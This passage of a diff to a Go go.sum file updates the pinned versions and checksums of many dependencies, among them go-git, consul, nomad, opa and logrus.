+github.com/foxcpp/go-mockdns v1.2.0 h1:omK3OrHRD1IWJz1FuFBCFquhXslXoF17OvBS6JPzZF0=
+github.com/foxcpp/go-mockdns v1.2.0/go.mod h1:IhLeSFGed3mJIAXPH2aiRQB+kqz7oqu8ld2qVbOu7Wk=
github.com/frankban/quicktest v1.14.6 h1:7Xjx+VpznH+oBnejlPUj8oUpdxnVs4f8XU8WnHkI4W8=
github.com/frankban/quicktest v1.14.6/go.mod h1:4ptaffx2x8+WTWXmUCuVU6aPUX1/Mz7zb5vbUoiM6w0=
github.com/fsnotify/fsnotify v1.9.0 h1:2Ml+OJNzbYCTzsxtv8vKSFD9PbJjmhYF14k/jKC7S9k=
github.com/fsnotify/fsnotify v1.9.0/go.mod h1:8jBTzvmWwFyi3Pb8djgCCO5IBqzKJ/Jwo8TRcHyHii0=
-github.com/gabriel-vasile/mimetype v1.4.11 h1:AQvxbp830wPhHTqc1u7nzoLT+ZFxGY7emj5DR5DYFik=
-github.com/gabriel-vasile/mimetype v1.4.11/go.mod h1:d+9Oxyo1wTzWdyVUPMmXFvp4F9tea18J8ufA774AB3s=
+github.com/gabriel-vasile/mimetype v1.4.12 h1:e9hWvmLYvtp846tLHam2o++qitpguFiYCKbn0w9jyqw=
+github.com/gabriel-vasile/mimetype v1.4.12/go.mod h1:d+9Oxyo1wTzWdyVUPMmXFvp4F9tea18J8ufA774AB3s=
github.com/getsentry/sentry-go v0.36.2 h1:uhuxRPTrUy0dnSzTd0LrYXlBYygLkKY0hhlG5LXarzM=
github.com/getsentry/sentry-go v0.36.2/go.mod h1:p5Im24mJBeruET8Q4bbcMfCQ+F+Iadc4L48tB1apo2c=
github.com/gliderlabs/ssh v0.3.8 h1:a4YXD1V7xMF9g5nTkdfnja3Sxy1PVDCj1Zg4Wb8vY6c=
@@ -184,14 +184,12 @@ github.com/go-fed/httpsig v1.1.0 h1:9M+hb0jkEICD8/cAiNqEB66R87tTINszBRTjwjQzWcI=
github.com/go-fed/httpsig v1.1.0/go.mod h1:RCMrTZvN1bJYtofsG4rd5NaO5obxQ5xBkdiS7xsT7bM=
github.com/go-git/gcfg v1.5.1-0.20230307220236-3a3c6141e376 h1:+zs/tPmkDkHx3U66DAb0lQFJrpS6731Oaa12ikc+DiI=
github.com/go-git/gcfg v1.5.1-0.20230307220236-3a3c6141e376/go.mod h1:an3vInlBmSxCcxctByoQdvwPiA7DTK7jaaFDBTtu0ic=
-github.com/go-git/go-billy/v5 v5.6.2 h1:6Q86EsPXMa7c3YZ3aLAQsMA0VlWmy43r6FHqa/UNbRM=
-github.com/go-git/go-billy/v5 v5.6.2/go.mod h1:rcFC2rAsp/erv7CMz9GczHcuD0D32fWzH+MJAU+jaUU=
+github.com/go-git/go-billy/v5 v5.8.0 h1:I8hjc3LbBlXTtVuFNJuwYuMiHvQJDq1AT6u4DwDzZG0=
+github.com/go-git/go-billy/v5 v5.8.0/go.mod h1:RpvI/rw4Vr5QA+Z60c6d6LXH0rYJo0uD5SqfmrrheCY=
github.com/go-git/go-git-fixtures/v4 v4.3.2-0.20231010084843-55a94097c399 h1:eMje31YglSBqCdIqdhKBW8lokaMrL3uTkpGYlE2OOT4=
github.com/go-git/go-git-fixtures/v4 v4.3.2-0.20231010084843-55a94097c399/go.mod h1:1OCfN199q1Jm3HZlxleg+Dw/mwps2Wbk9frAWm+4FII=
-github.com/go-git/go-git/v5 v5.16.3 h1:Z8BtvxZ09bYm/yYNgPKCzgWtaRqDTgIKRgIRHBfU6Z8=
-github.com/go-git/go-git/v5 v5.16.3/go.mod h1:4Ge4alE/5gPs30F2H1esi2gPd69R0C39lolkucHBOp8=
-github.com/go-ini/ini v1.67.0 h1:z6ZrTEZqSWOTyH2FlglNbNgARyHG8oLW9gMELqKr06A=
-github.com/go-ini/ini v1.67.0/go.mod h1:ByCAeIL28uOIIG0E3PJtZPDL8WnHpFKFOtgjp+3Ies8=
+github.com/go-git/go-git/v5 v5.17.0 h1:AbyI4xf+7DsjINHMu35quAh4wJygKBKBuXVjV/pxesM=
+github.com/go-git/go-git/v5 v5.17.0/go.mod h1:f82C4YiLx+Lhi8eHxltLeGC5uBTXSFa6PC5WW9o4SjI=
github.com/go-jose/go-jose/v4 v4.1.3 h1:CVLmWDhDVRa6Mi/IgCgaopNosCaHz7zrMeF9MlZRkrs=
github.com/go-jose/go-jose/v4 v4.1.3/go.mod h1:x4oUasVrzR7071A4TnHLGSPpNOm2a21K9Kf04k1rs08=
github.com/go-kit/kit v0.8.0/go.mod h1:xBxKIO96dXMWWy0MnWVtmwkA9/13aqxPnvrjFYMA2as=
@@ -216,8 +214,8 @@ github.com/go-playground/locales v0.14.1 h1:EWaQ/wswjilfKLTECiXz7Rh+3BjFhfDFKv/o
github.com/go-playground/locales v0.14.1/go.mod h1:hxrqLVvrK65+Rwrd5Fc6F2O76J/NuW9t0sjnWqG1slY=
github.com/go-playground/universal-translator v0.18.1 h1:Bcnm0ZwsGyWbCzImXv+pAJnYK9S473LQFuzCbDbfSFY=
github.com/go-playground/universal-translator v0.18.1/go.mod h1:xekY+UJKNuX9WP91TpwSH2VMlDf28Uj24BCp08ZFTUY=
-github.com/go-playground/validator/v10 v10.28.0 h1:Q7ibns33JjyW48gHkuFT91qX48KG0ktULL6FgHdG688=
-github.com/go-playground/validator/v10 v10.28.0/go.mod h1:GoI6I1SjPBh9p7ykNE/yj3fFYbyDOpwMn5KXd+m2hUU=
+github.com/go-playground/validator/v10 v10.30.1 h1:f3zDSN/zOma+w6+1Wswgd9fLkdwy06ntQJp0BBvFG0w=
+github.com/go-playground/validator/v10 v10.30.1/go.mod h1:oSuBIQzuJxL//3MelwSLD5hc2Tu889bF0Idm9Dg26cM=
github.com/go-quicktest/qt v1.101.0 h1:O1K29Txy5P2OK0dGo59b7b0LR6wKfIhttaAhHUyn7eI=
github.com/go-quicktest/qt v1.101.0/go.mod h1:14Bz/f7NwaXPtdYEgzsx46kqSxVwTbzVZsDC26tQJow=
github.com/go-resty/resty/v2 v2.16.5 h1:hBKqmWrr7uRc3euHVqmh1HTHcKn99Smr7o5spptdhTM=
@@ -225,16 +223,16 @@ github.com/go-resty/resty/v2 v2.16.5/go.mod h1:hkJtXbA2iKHzJheXYvQ8snQES5ZLGKMwQ
github.com/go-stack/stack v1.8.0/go.mod h1:v0f6uXyyMGvRgIKkXu+yp6POWl0qKG85gN/melR3HDY=
github.com/go-test/deep v1.1.1 h1:0r/53hagsehfO4bzD2Pgr/+RgHqhmf+k1Bpse2cTu1U=
github.com/go-test/deep v1.1.1/go.mod h1:5C2ZWiW0ErCdrYzpqxLbTX7MG14M9iiw8DgHncVwcsE=
-github.com/go-viper/mapstructure/v2 v2.4.0 h1:EBsztssimR/CONLSZZ04E8qAkxNYq4Qp9LvH92wZUgs=
-github.com/go-viper/mapstructure/v2 v2.4.0/go.mod h1:oJDH3BJKyqBA2TXFhDsKDGDTlndYOZ6rGS0BRZIxGhM=
+github.com/go-viper/mapstructure/v2 v2.5.0 h1:vM5IJoUAy3d7zRSVtIwQgBj7BiWtMPfmPEgAXnvj1Ro=
+github.com/go-viper/mapstructure/v2 v2.5.0/go.mod h1:oJDH3BJKyqBA2TXFhDsKDGDTlndYOZ6rGS0BRZIxGhM=
github.com/gobwas/glob v0.2.3 h1:A4xDbljILXROh+kObIiy5kIaPYD8e96x1tgBhUI5J+Y=
github.com/gobwas/glob v0.2.3/go.mod h1:d3Ez4x06l9bZtSvzIay5+Yzi0fmZzPgnTbPcKjJAkT8=
github.com/goccy/go-json v0.10.5 h1:Fq85nIqj+gXn/S5ahsiTlK3TmC85qgirsdTP/+DeaC4=
github.com/goccy/go-json v0.10.5/go.mod h1:oq7eo15ShAhp70Anwd5lgX2pLfOS3QCiwU/PULtXL6M=
github.com/godbus/dbus/v5 v5.1.1-0.20230522191255-76236955d466 h1:sQspH8M4niEijh3PFscJRLDnkL547IeP7kpPe3uUhEg=
github.com/godbus/dbus/v5 v5.1.1-0.20230522191255-76236955d466/go.mod h1:ZiQxhyQ+bbbfxUKVvjfO498oPYvtYhZzycal3G/NHmU=
-github.com/gofrs/uuid/v5 v5.3.2 h1:2jfO8j3XgSwlz/wHqemAEugfnTlikAYHhnqQ8Xh4fE0=
-github.com/gofrs/uuid/v5 v5.3.2/go.mod h1:CDOjlDMVAtN56jqyRUZh58JT31Tiw7/oQyEXZV+9bD8=
+github.com/gofrs/uuid/v5 v5.4.0 h1:EfbpCTjqMuGyq5ZJwxqzn3Cbr2d0rUZU7v5ycAk/e/0=
+github.com/gofrs/uuid/v5 v5.4.0/go.mod h1:CDOjlDMVAtN56jqyRUZh58JT31Tiw7/oQyEXZV+9bD8=
github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ=
github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q=
github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q=
@@ -268,12 +266,12 @@ github.com/gorilla/mux v1.8.1 h1:TuBL49tXwgrFYWhqrNgrUNEY92u81SPhu7sTdzQEiWY=
github.com/gorilla/mux v1.8.1/go.mod h1:AKf9I4AEqPTmMytcMc0KkNouC66V3BtZ4qD5fmWSiMQ=
github.com/gorilla/websocket v1.5.3 h1:saDtZ6Pbx/0u+bgYQ3q96pZgCzfhKXGPqt7kZ72aNNg=
github.com/gorilla/websocket v1.5.3/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
-github.com/grpc-ecosystem/grpc-gateway/v2 v2.27.2 h1:8Tjv8EJ+pM1xP8mK6egEbD1OgnVTyacbefKhmbLhIhU=
-github.com/grpc-ecosystem/grpc-gateway/v2 v2.27.2/go.mod h1:pkJQ2tZHJ0aFOVEEot6oZmaVEZcRme73eIFmhiVuRWs=
-github.com/hashicorp/consul/api v1.20.0 h1:9IHTjNVSZ7MIwjlW3N3a7iGiykCMDpxZu8jsxFJh0yc=
-github.com/hashicorp/consul/api v1.20.0/go.mod h1:nR64eD44KQ59Of/ECwt2vUmIK2DKsDzAwTmwmLl8Wpo=
-github.com/hashicorp/consul/sdk v0.13.1 h1:EygWVWWMczTzXGpO93awkHFzfUka6hLYJ0qhETd+6lY=
-github.com/hashicorp/consul/sdk v0.13.1/go.mod h1:SW/mM4LbKfqmMvcFu8v+eiQQ7oitXEFeiBe9StxERb0=
+github.com/grpc-ecosystem/grpc-gateway/v2 v2.27.7 h1:X+2YciYSxvMQK0UZ7sg45ZVabVZBeBuvMkmuI2V3Fak=
+github.com/grpc-ecosystem/grpc-gateway/v2 v2.27.7/go.mod h1:lW34nIZuQ8UDPdkon5fmfp2l3+ZkQ2me/+oecHYLOII=
+github.com/hashicorp/consul/api v1.33.4 h1:AJkZp6qzgAYcMIU0+CjJ0Rb7+byfh0dazFK/gzlOcJk=
+github.com/hashicorp/consul/api v1.33.4/go.mod h1:BkH3WEUzsnWvJJaHoDqKqoe2Q2EIixx7Gjj6MTwYnOA=
+github.com/hashicorp/consul/sdk v0.17.2 h1:sC0jgNhJkZX3wo1DCrkG12r+1JlZQpWvk3AoL3yZE4Q=
+github.com/hashicorp/consul/sdk v0.17.2/go.mod h1:VjccKcw6YhMhjH84/ZhTXZ0OG4SUq+K25P6DiCV/Hvg=
github.com/hashicorp/cronexpr v1.1.3 h1:rl5IkxXN2m681EfivTlccqIryzYJSXRGRNa0xeG7NA4=
github.com/hashicorp/cronexpr v1.1.3/go.mod h1:P4wA0KBl9C5q2hABiMO7cp6jcIg96CDh1Efb3g1PWA4=
github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4=
@@ -289,7 +287,7 @@ github.com/hashicorp/go-immutable-radix v1.3.1 h1:DKHmCUm2hRBK510BaiZlwvpD40f8bJ
github.com/hashicorp/go-immutable-radix v1.3.1/go.mod h1:0y9vanUI8NX6FsYoO3zeMjhV/C5i9g4Q3DwcSNZ4P60=
github.com/hashicorp/go-metrics v0.5.4 h1:8mmPiIJkTPPEbAiV97IxdAGNdRdaWwVap1BU6elejKY=
github.com/hashicorp/go-metrics v0.5.4/go.mod h1:CG5yz4NZ/AI/aQt9Ucm/vdBnbh7fvmv4lxZ350i+QQI=
-github.com/hashicorp/go-msgpack v0.5.3 h1:zKjpN5BK/P5lMYrLmBHdBULWbJ0XpYR+7NGzqkZzoD4=
+github.com/hashicorp/go-msgpack v0.5.5 h1:i9R9JSrqIz0QVLz3sz+i3YJdT7TTSLcfLLzJi9aZTuI=
github.com/hashicorp/go-msgpack/v2 v2.1.2 h1:4Ee8FTp834e+ewB71RDrQ0VKpyFdrKOjvYtnQ/ltVj0=
github.com/hashicorp/go-msgpack/v2 v2.1.2/go.mod h1:upybraOAblm4S7rx0+jeNy+CWWhzywQsSRV5033mMu4=
github.com/hashicorp/go-multierror v1.1.1 h1:H5DkEtf6CXdFp0N0Em5UCwQpXMWke8IA0+lD48awMYo=
@@ -308,8 +306,8 @@ github.com/hashicorp/go-sockaddr v1.0.7/go.mod h1:FZQbEYa1pxkQ7WLpyXJ6cbjpT8q0Yg
github.com/hashicorp/go-uuid v1.0.0/go.mod h1:6SBZvOh/SIDV7/2o3Jml5SYk/TvGqwFJ/bN7x4byOro=
github.com/hashicorp/go-uuid v1.0.3 h1:2gKiV6YVmrJ1i2CKKa9obLvRieoRGviZFL26PcT/Co8=
github.com/hashicorp/go-uuid v1.0.3/go.mod h1:6SBZvOh/SIDV7/2o3Jml5SYk/TvGqwFJ/bN7x4byOro=
-github.com/hashicorp/go-version v1.7.0 h1:5tqGy27NaOTB8yJKUZELlFAS/LTKJkrmONwQKeRZfjY=
-github.com/hashicorp/go-version v1.7.0/go.mod h1:fltr4n8CU8Ke44wwGCBoEymUuxUHl09ZGVZPK5anwXA=
+github.com/hashicorp/go-version v1.8.0 h1:KAkNb1HAiZd1ukkxDFGmokVZe1Xy9HG6NUp+bPle2i4=
+github.com/hashicorp/go-version v1.8.0/go.mod h1:fltr4n8CU8Ke44wwGCBoEymUuxUHl09ZGVZPK5anwXA=
github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
github.com/hashicorp/golang-lru v1.0.2 h1:dV3g9Z/unq5DpblPpw+Oqcv4dU/1omnb4Ok8iPY6p1c=
github.com/hashicorp/golang-lru v1.0.2/go.mod h1:iADmTwqILo4mZ8BN3D2Q6+9jd8WM5uGBxy+E8yxSoD4=
@@ -321,8 +319,8 @@ github.com/hashicorp/hcl/v2 v2.24.0 h1:2QJdZ454DSsYGoaE6QheQZjtKZSUs9Nh2izTWiwQx
github.com/hashicorp/hcl/v2 v2.24.0/go.mod h1:oGoO1FIQYfn/AgyOhlg9qLC6/nOJPX3qGbkZpYAcqfM=
github.com/hashicorp/memberlist v0.5.2 h1:rJoNPWZ0juJBgqn48gjy59K5H4rNgvUoM1kUD7bXiuI=
github.com/hashicorp/memberlist v0.5.2/go.mod h1:Ri9p/tRShbjYnpNf4FFPXG7wxEGY4Nrcn6E7jrVa//4=
-github.com/hashicorp/nomad/api v0.0.0-20251105172100-f20a01eda06e h1:CmXFaY0DMPaUMfszqH4yaC4/qhrVi7vEG9M5c2KP28w=
-github.com/hashicorp/nomad/api v0.0.0-20251105172100-f20a01eda06e/go.mod h1:sldFTIgs+FsUeKU3LwVjviAIuksxD8TzDOn02MYwslE=
+github.com/hashicorp/nomad/api v0.0.0-20260226211936-d304b7de5d67 h1:Tj+OLJwGAdtasycqaL9ZV+JbMmpfREIpchNEkxR25AU=
+github.com/hashicorp/nomad/api v0.0.0-20260226211936-d304b7de5d67/go.mod h1:KkLNLU0Nyfh5jWsFoF/PsmMbKpRIAoIV4lmQoJWgKCk=
github.com/hashicorp/serf v0.10.2 h1:m5IORhuNSjaxeljg5DeQVDlQyVkhRIjJDimbkCa8aAc=
github.com/hashicorp/serf v0.10.2/go.mod h1:T1CmSGfSeGfnfNy/w0odXQUR1rfECGd2Qdsp84DjOiY=
github.com/hashicorp/terraform-exec v0.24.0 h1:mL0xlk9H5g2bn0pPF6JQZk5YlByqSqrO5VoaNtAf8OE=
@@ -379,8 +377,8 @@ github.com/kevinburke/ssh_config v1.4.0/go.mod h1:q2RIzfka+BXARoNexmF9gkxEX7Dmvb
github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8=
github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck=
github.com/kisielk/sqlstruct v0.0.0-20201105191214-5f3e10d3ab46/go.mod h1:yyMNCyc/Ib3bDTKd379tNMpB/7/H5TjM2Y9QJ5THLbE=
-github.com/klauspost/compress v1.18.0 h1:c/Cqfb0r+Yi+JtIEq73FWXVkRonBlf0CRNYc8Zttxdo=
-github.com/klauspost/compress v1.18.0/go.mod h1:2Pp+KzxcywXVXMr50+X0Q/Lsb43OQHYWRCY2AiWywWQ=
+github.com/klauspost/compress v1.18.2 h1:iiPHWW0YrcFgpBYhsA6D1+fqHssJscY/Tm/y2Uqnapk=
+github.com/klauspost/compress v1.18.2/go.mod h1:R0h/fSBs8DE4ENlcrlib3PsXS61voFxhIs2DeRhCvJ4=
github.com/klauspost/cpuid/v2 v2.3.0 h1:S4CRMLnYUhGeDFDqkGriYKdfoFlDnMtqTiI/sFzhA9Y=
github.com/klauspost/cpuid/v2 v2.3.0/go.mod h1:hqwkgyIinND0mEev00jJYCxPNVRVXFQeu1XKlok6oO0=
github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ=
@@ -405,16 +403,14 @@ github.com/lestrrat-go/dsig-secp256k1 v1.0.0 h1:JpDe4Aybfl0soBvoVwjqDbp+9S1Y2OM7
github.com/lestrrat-go/dsig-secp256k1 v1.0.0/go.mod h1:CxUgAhssb8FToqbL8NjSPoGQlnO4w3LG1P0qPWQm/NU=
github.com/lestrrat-go/httpcc v1.0.1 h1:ydWCStUeJLkpYyjLDHihupbn2tYmZ7m22BGkcvZZrIE=
github.com/lestrrat-go/httpcc v1.0.1/go.mod h1:qiltp3Mt56+55GPVCbTdM9MlqhvzyuL6W/NMDA8vA5E=
-github.com/lestrrat-go/httprc/v3 v3.0.1 h1:3n7Es68YYGZb2Jf+k//llA4FTZMl3yCwIjFIk4ubevI=
-github.com/lestrrat-go/httprc/v3 v3.0.1/go.mod h1:2uAvmbXE4Xq8kAUjVrZOq1tZVYYYs5iP62Cmtru00xk=
-github.com/lestrrat-go/jwx/v3 v3.0.12 h1:p25r68Y4KrbBdYjIsQweYxq794CtGCzcrc5dGzJIRjg=
-github.com/lestrrat-go/jwx/v3 v3.0.12/go.mod h1:HiUSaNmMLXgZ08OmGBaPVvoZQgJVOQphSrGr5zMamS8=
-github.com/lestrrat-go/option v1.0.1 h1:oAzP2fvZGQKWkvHa1/SAcFolBEca1oN+mQ7eooNBEYU=
-github.com/lestrrat-go/option v1.0.1/go.mod h1:5ZHFbivi4xwXxhxY9XHDe2FHo6/Z7WWmtT7T5nBBp3I=
+github.com/lestrrat-go/httprc/v3 v3.0.2 h1:7u4HUaD0NQbf2/n5+fyp+T10hNCsAnwKfqn4A4Baif0=
+github.com/lestrrat-go/httprc/v3 v3.0.2/go.mod h1:mSMtkZW92Z98M5YoNNztbRGxbXHql7tSitCvaxvo9l0=
+github.com/lestrrat-go/jwx/v3 v3.0.13 h1:AdHKiPIYeCSnOJtvdpipPg/0SuFh9rdkN+HF3O0VdSk=
+github.com/lestrrat-go/jwx/v3 v3.0.13/go.mod h1:2m0PV1A9tM4b/jVLMx8rh6rBl7F6WGb3EG2hufN9OQU=
github.com/lestrrat-go/option/v2 v2.0.0 h1:XxrcaJESE1fokHy3FpaQ/cXW8ZsIdWcdFzzLOcID3Ss=
github.com/lestrrat-go/option/v2 v2.0.0/go.mod h1:oSySsmzMoR0iRzCDCaUfsCzxQHUEuhOViQObyy7S6Vg=
-github.com/lib/pq v1.10.9 h1:YXG7RB+JIjhP29X+OtkiDnYaXQwpS4JEWq7dtCCRUEw=
-github.com/lib/pq v1.10.9/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o=
+github.com/lib/pq v1.11.2 h1:x6gxUeu39V0BHZiugWe8LXZYZ+Utk7hSJGThs8sdzfs=
+github.com/lib/pq v1.11.2/go.mod h1:/p+8NSbOcwzAEI7wiMXFlgydTwcgTr3OSKMsD2BitpA=
github.com/lucasb-eyer/go-colorful v1.3.0 h1:2/yBRLdWBZKrf7gB40FoiKfAWYQ0lqNcbuQwVHXptag=
github.com/lucasb-eyer/go-colorful v1.3.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i7ruzyGqttikkLy0=
github.com/lufia/plan9stats v0.0.0-20251013123823-9fd1530e3ec3 h1:PwQumkgq4/acIiZhtifTV5OUqqiP82UAl0h87xj/l9k=
@@ -468,14 +464,14 @@ github.com/olekukonko/cat v0.0.0-20250911104152-50322a0618f6 h1:zrbMGy9YXpIeTnGj
github.com/olekukonko/cat v0.0.0-20250911104152-50322a0618f6/go.mod h1:rEKTHC9roVVicUIfZK7DYrdIoM0EOr8mK1Hj5s3JjH0=
github.com/olekukonko/errors v1.1.0 h1:RNuGIh15QdDenh+hNvKrJkmxxjV4hcS50Db478Ou5sM=
github.com/olekukonko/errors v1.1.0/go.mod h1:ppzxA5jBKcO1vIpCXQ9ZqgDh8iwODz6OXIGKU8r5m4Y=
-github.com/olekukonko/ll v0.1.2 h1:lkg/k/9mlsy0SxO5aC+WEpbdT5K83ddnNhAepz7TQc0=
-github.com/olekukonko/ll v0.1.2/go.mod h1:b52bVQRRPObe+yyBl0TxNfhesL0nedD4Cht0/zx55Ew=
-github.com/olekukonko/tablewriter v1.1.0 h1:N0LHrshF4T39KvI96fn6GT8HEjXRXYNDrDjKFDB7RIY=
-github.com/olekukonko/tablewriter v1.1.0/go.mod h1:5c+EBPeSqvXnLLgkm9isDdzR3wjfBkHR9Nhfp3NWrzo=
+github.com/olekukonko/ll v0.1.4-0.20260115111900-9e59c2286df0 h1:jrYnow5+hy3WRDCBypUFvVKNSPPCdqgSXIE9eJDD8LM=
+github.com/olekukonko/ll v0.1.4-0.20260115111900-9e59c2286df0/go.mod h1:b52bVQRRPObe+yyBl0TxNfhesL0nedD4Cht0/zx55Ew=
+github.com/olekukonko/tablewriter v1.1.3 h1:VSHhghXxrP0JHl+0NnKid7WoEmd9/urKRJLysb70nnA=
+github.com/olekukonko/tablewriter v1.1.3/go.mod h1:9VU0knjhmMkXjnMKrZ3+L2JhhtsQ/L38BbL3CRNE8tM=
github.com/onsi/gomega v1.34.1 h1:EUMJIKUjM8sKjYbtxQI9A4z2o+rruxnzNvpknOXie6k=
github.com/onsi/gomega v1.34.1/go.mod h1:kU1QgUvBDLXBJq618Xvm2LUX6rSAfRaFRTcdOeDLwwY=
-github.com/open-policy-agent/opa v1.10.1 h1:haIvxZSPky8HLjRrvQwWAjCPLg8JDFSZMbbG4yyUHgY=
-github.com/open-policy-agent/opa v1.10.1/go.mod h1:7uPI3iRpOalJ0BhK6s1JALWPU9HvaV1XeBSSMZnr/PM=
+github.com/open-policy-agent/opa v1.14.0 h1:sdG94h9GrZQQcTaH70fJhOuU+/C2FAeeAo8mSPssV/U=
+github.com/open-policy-agent/opa v1.14.0/go.mod h1:e+JSg7BVV9/vRcD5HYTUeyKIrvigPxYX6T1KcVUaHaM=
github.com/opencontainers/go-digest v1.0.0 h1:apOUWs51W5PlhuyGyz9FCeeBIOUDA/6nW8Oi/yOhh5U=
github.com/opencontainers/go-digest v1.0.0/go.mod h1:0JzlMkj0TRzQZfJkVvzbP0HBR3IKzErnv2BNG4W4MAM=
github.com/opencontainers/image-spec v1.1.1 h1:y0fUlFfIZhPF1W537XOLg0/fcx6zcHCJwooC2xJA040=
@@ -527,8 +523,8 @@ github.com/protocolbuffers/txtpbfmt v0.0.0-20251016062345-16587c79cd91 h1:s1LvMa
github.com/protocolbuffers/txtpbfmt v0.0.0-20251016062345-16587c79cd91/go.mod h1:JSbkp0BviKovYYt9XunS95M3mLPibE9bGg+Y95DsEEY=
github.com/rcrowley/go-metrics v0.0.0-20250401214520-65e299d6c5c9 h1:bsUq1dX0N8AOIL7EB/X911+m4EHsnWEHeJ0c+3TTBrg=
github.com/rcrowley/go-metrics v0.0.0-20250401214520-65e299d6c5c9/go.mod h1:bCqnVzQkZxMG4s8nGwiZ5l3QUCyqpo9Y+/ZMZ9VjZe4=
-github.com/redis/go-redis/v9 v9.16.0 h1:OotgqgLSRCmzfqChbQyG1PHC3tLNR89DG4jdOERSEP4=
-github.com/redis/go-redis/v9 v9.16.0/go.mod h1:u410H11HMLoB+TP67dz8rL9s6QW2j76l0//kSOd3370=
+github.com/redis/go-redis/v9 v9.18.0 h1:pMkxYPkEbMPwRdenAzUNyFNrDgHx9U+DrBabWNfSRQs=
+github.com/redis/go-redis/v9 v9.18.0/go.mod h1:k3ufPphLU5YXwNTUcCRXGxUoF1fqxnhFQmscfkCoDA0=
github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ=
github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88=
github.com/rogpeppe/go-internal v1.9.0/go.mod h1:WtVeX8xhTBvf0smdhujwtBcq4Qrzq/fJaraNFVN+nFs=
@@ -549,16 +545,16 @@ github.com/segmentio/asm v1.2.1 h1:DTNbBqs57ioxAD4PrArqftgypG4/qNpXoJx8TVXxPR0=
github.com/segmentio/asm v1.2.1/go.mod h1:BqMnlJP91P8d+4ibuonYZw9mfnzI9HfxselHZr5aAcs=
github.com/sergi/go-diff v1.4.0 h1:n/SP9D5ad1fORl+llWyN+D6qoUETXNZARKjyY2/KVCw=
github.com/sergi/go-diff v1.4.0/go.mod h1:A0bzQcvG0E7Rwjx0REVgAGH58e96+X0MeOfepqsbeW4=
-github.com/shirou/gopsutil/v4 v4.25.10 h1:at8lk/5T1OgtuCp+AwrDofFRjnvosn0nkN2OLQ6g8tA=
-github.com/shirou/gopsutil/v4 v4.25.10/go.mod h1:+kSwyC8DRUD9XXEHCAFjK+0nuArFJM0lva+StQAcskM=
+github.com/shirou/gopsutil/v4 v4.26.2 h1:X8i6sicvUFih4BmYIGT1m2wwgw2VG9YgrDTi7cIRGUI=
+github.com/shirou/gopsutil/v4 v4.26.2/go.mod h1:LZ6ewCSkBqUpvSOf+LsTGnRinC6iaNUNMGBtDkJBaLQ=
github.com/shoenig/test v1.12.2 h1:ZVT8NeIUwGWpZcKaepPmFMoNQ3sVpxvqUh/MAqwFiJI=
github.com/shoenig/test v1.12.2/go.mod h1:UxJ6u/x2v/TNs/LoLxBNJRV9DiwBBKYxXSyczsBHFoI=
github.com/sirupsen/logrus v1.2.0/go.mod h1:LxeOpSwHxABJmUn/MG1IvRgCAasNZTLOkJPxbbu5VWo=
github.com/sirupsen/logrus v1.4.2/go.mod h1:tLMulIdttU9McNUspp0xgXVQah82FyeX6MwdIuYE2rE=
github.com/sirupsen/logrus v1.6.0/go.mod h1:7uNnSEd1DgxDLC74fIahvMZmmYsHGZGEOFrfsX/uA88=
github.com/sirupsen/logrus v1.7.0/go.mod h1:yWOB1SBYBC5VeMP7gHvWumXLIWorT60ONWic61uBYv0=
-github.com/sirupsen/logrus v1.9.4-0.20230606125235-dd1b4c2e81af h1:Sp5TG9f7K39yfB+If0vjp97vuT74F72r8hfRpP8jLU0=
-github.com/sirupsen/logrus v1.9.4-0.20230606125235-dd1b4c2e81af/go.mod h1:naHLuLoDiP4jHNo9R0sCBMtWGeIprob74mVsIT4qYEQ=
+github.com/sirupsen/logrus v1.9.4 h1:TsZE7l11zFCLZnZ+teH4Umoq5BhEIfIzfRDZ1Uzql2w=
+github.com/sirupsen/logrus v1.9.4/go.mod h1:ftWc9WdOfJ0a92nsE2jF5u5ZwH8Bv2zdeOC42RjbV2g=
github.com/skeema/knownhosts v1.3.2 h1:EDL9mgf4NzwMXCTfaxSD/o/a5fxDw/xL9nkU28JjdBg=
github.com/skeema/knownhosts v1.3.2/go.mod h1:bEg3iQAuw+jyiw+484wwFJoKSLwcfd7fqRy+N0QTiow=
github.com/sony/gobreaker v1.0.0 h1:feX5fGGXSl3dYd4aHZItw+FpHLvvoaqkawKjVNiFMNQ=
@@ -567,8 +563,8 @@ github.com/spf13/afero v1.15.0 h1:b/YBCLWAJdFWJTN9cLhiXXcD7mzKn9Dm86dNnfyQw1I=
github.com/spf13/afero v1.15.0/go.mod h1:NC2ByUVxtQs4b3sIUphxK0NioZnmxgyCrfzeuq8lxMg=
github.com/spf13/cast v1.10.0 h1:h2x0u2shc1QuLHfxi+cTJvs30+ZAHOGRic8uyGTDWxY=
github.com/spf13/cast v1.10.0/go.mod h1:jNfB8QC9IA6ZuY2ZjDp0KtFO2LZZlg4S/7bzP6qqeHo=
-github.com/spf13/cobra v1.10.1 h1:lJeBwCfmrnXthfAupyUTzJ/J4Nc1RsHC/mSRU2dll/s=
-github.com/spf13/cobra v1.10.1/go.mod h1:7SmJGaTHFVBY0jW4NXGluQoLvhqFQM+6XSKD+P4XaB0=
